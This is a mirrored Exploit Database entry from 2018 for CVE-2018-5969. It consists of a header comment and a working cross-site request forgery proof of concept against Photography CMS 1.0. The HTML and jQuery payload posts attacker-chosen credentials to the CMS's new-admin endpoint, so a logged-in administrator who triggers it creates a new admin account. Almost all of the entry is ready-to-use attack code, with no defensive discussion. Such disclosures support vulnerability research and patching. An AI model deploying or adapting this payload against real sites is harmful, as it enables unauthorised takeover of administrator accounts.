Photography CMS 1.0 – Cross-Site Request Forgery (Add Admin)

• Exploit Database
• 16 阅读

• 作者： Ihsan Sencan
  日期： 2018-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/43867/

• <!--
  # # # # # 
  # Exploit Title: Photography CMS 1.0 - Cross-Site Request Forgery (Add Admin)
  # Dork: N/A
  # Date: 23.01.2018
  # Vendor Homepage: http://ronnieswietek.com/
  # Software Link: https://codecanyon.net/item/client-photo-studio-photography-cms/1191688
  # Version: 1.0
  # Category: Webapps
  # Tested on: WiN7_x64/KaLiLinuX_x64
  # CVE: CVE-2018-5969
  # # # # #
  # Exploit Author: Ihsan Sencan
  # Author Web: http://ihsan.net
  # Author Social: @ihsansencan
  # # # # #
  # 
  # Proof of Concept:
  # 1)
  -->
  <html>
  <body>
  <script src="http://code.jquery.com/jquery-1.7.1.min.js"></script>
  <h2>New Admin</h2>
  <div class="efe">
  <form method="post" onSubmit="return false">
  	<label for="username">Username:</label>
  	<input id="username" type="text"><br><br>
  
  	<label for="password1">Password:</label>
  	<input id="password1" type="password"><br><br>
  
  	<label for="password2">Confirm Password:</label>
  	<input id="password2" type="password"><br><br>
  
  	<label for="email">Email:</label>
  	<input id="email" type="text"><br><br>
  
  	<input id="ekleabi" value="Ver Ayari" type="submit">
  </form>
  </div>
  <script type="text/javascript">
  	$("#ekleabi").live('click',function()
  	{
  		$.ajax({
  			type: "POST",
  			url: "http://ronnieswietek.com/cc/clients/resources/ajax/ajax_new_admin.php",
  			data:{
  				username:$(".efe #username").val(),
  				password1:$(".efe #password1").val(),
  				password2:$(".efe #password2").val(),
  				email:$(".efe #email").val()
  			}
  		});
  	});
  </script>
  </body>
  </html>